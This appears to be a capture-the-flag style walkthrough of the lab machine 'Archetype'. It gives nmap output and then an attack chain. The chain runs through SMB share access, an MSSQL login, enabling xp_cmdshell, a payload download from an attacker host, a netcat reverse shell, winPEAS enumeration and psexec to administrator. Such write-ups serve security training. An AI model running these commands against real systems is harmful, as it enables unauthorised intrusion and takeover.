Archetype

January 27, 2024

# Nmap 7.94 scan initiated Sat Jan 27 06:26:28 2024 as: nmap -sC -sV -oN nmap -vv 10.129.171.182
Increasing send delay for 10.129.171.182 from 0 to 5 due to 41 out of 136 dropped probes since last increase.
Increasing send delay for 10.129.171.182 from 10 to 20 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.129.171.182
Host is up, received conn-refused (0.25s latency).
Scanned at 2024-01-27 06:26:28 PST for 65s
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE     REASON  VERSION
135/tcp  open  msrpc       syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp  open  �i�@V      syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s    syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info: 
|   10.129.171.182:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-26T22:25:48
| Not valid after:  2054-01-26T22:25:48
| MD5:   e9c3:8935:ecf0:84f2:0ae1:bbfc:2bfb:9e03
| SHA-1: b9d6:0ba9:1d39:00ae:0a72:743b:2d2a:b996:3945:b5d1
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQEXcxNuY4oKRK3CTHMZlRgjANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwMTI2MjIyNTQ4WhgPMjA1NDAxMjYyMjI1NDhaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMPisCIW
| KYPkaJ6FSy2uSzpGujM17iQQvJWFAlvslr1RodNhyopAGcE9uclyaoeAOF0ccB2p
| KbXj5v6QzeZFx5QFuhcv7juald8ysvzcVV9VvX19lnEn2i1Wt26WlZyhgBBwHUQY
| awOpMnBB7700gNrznn8D7NFM60um/GjlYu/hT+8B8BUoll5YjS31uQYcbGOHnkp4
| z0rx0Vswd6fGKYZSTRp+QLEdf7S14REDu5h+I6caN+8sZZ9KCeQcqznPpaOjbvF6
| BTZBh3mXwE+CRULOJZ7deJcNH6T+wrkpKfRiARd+8iybE1EDqxNgpYU2VWypYj96
| CslbsV7CyyhMsx0CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAgaBIHXurD/q7eyJ5
| GOyhtzDCNLqUIeiZlY7Zf3Eov5J7p8WDMqZb8QnBnTkJYnHGcBrVGEzwp8CwoH4E
| 4VN/YyLcyT4biElYEiZxv62RFGqpWvEWwTrbBl1QPSAvm7lUtA2t223iNB83R+Y5
| pzPzQ5VJABDMFG7eVL3TE7YVRvwnrz2kVcRufqVduD3QtrfjQ4gnXUXEwrbWGhqm
| f2Z2X3gH5BDNbSzQwYfL9THu142/vzrLIe9Nc2A3Qt/6dsCIwTtKzvEXbpqMyMYp
| tpe79tvzkhM+tsb6KoAuexHGMCmfEDtEexHZQFQ88AuetV8zzVjiMZ9YY0g+EOSF
| Lw0utQ==
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info: 
|   10.129.171.182:1433: 
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-01-26T22:27:42+00:00; +9s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-26T22:27:32
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-01-26T14:27:31-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59442/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 42495/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 53074/udp): CLEAN (Timeout)
|   Check 4 (port 58756/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h36m09s, deviation: 3h34m41s, median: 8s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 27 06:27:33 2024 -- 1 IP address (1 host up) scanned in 65.86 seconds

nmap -sV -p 445 10.129.171.182
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 06:30 PST
Nmap scan report for 10.129.171.182
Host is up (0.25s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds

I just double nmap scan the port 445 because it bugs when using scripts

After that we will use smbclient to display the available shares in the smb

smbclient -L 10.129.171.182

Then we will connect to backups share

smbclient \\\\10.129.171.182\\backups

cat prod.dtsConfig

cd ~/impacket/examples
python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.171.182 -windows-auth

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68:8000/nc64.exe -outfile nc64.exe"

Then after that we will execute the payload and get the reverse shell connection

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.68 443

cd ~/Downloads
python3 -m http.server

powershell
wget http://10.10.14.68:8000/winPEASx64.exe -outfile winPEASx64.exe

Just execute the winpeas

Then we get the result here

Move to that directory

cd ~/impacket/examples
python3 psexec.py administrator@10.129.171.182